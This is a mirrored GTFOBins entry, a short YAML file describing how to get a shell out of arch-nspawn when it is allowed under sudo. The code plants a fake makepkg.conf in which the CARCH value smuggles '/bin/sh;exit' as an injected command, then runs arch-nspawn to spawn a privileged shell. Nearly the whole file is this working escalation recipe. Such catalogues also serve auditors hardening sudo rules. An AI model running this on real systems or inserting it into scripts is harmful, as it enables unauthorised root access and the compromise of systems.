mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
13 lines
286 B
Plaintext
13 lines
286 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
mkdir -p ./etc/
|
|
grep -oP "^CHROOT_VERSION='\K[^']+" /usr/share/devtools/lib/archroot.sh >.arch-chroot
|
|
touch ./etc/pacman.conf
|
|
echo 'CARCH=true;/bin/sh;exit' >etc/makepkg.conf
|
|
arch-nspawn .
|
|
contexts:
|
|
sudo:
|
|
...
|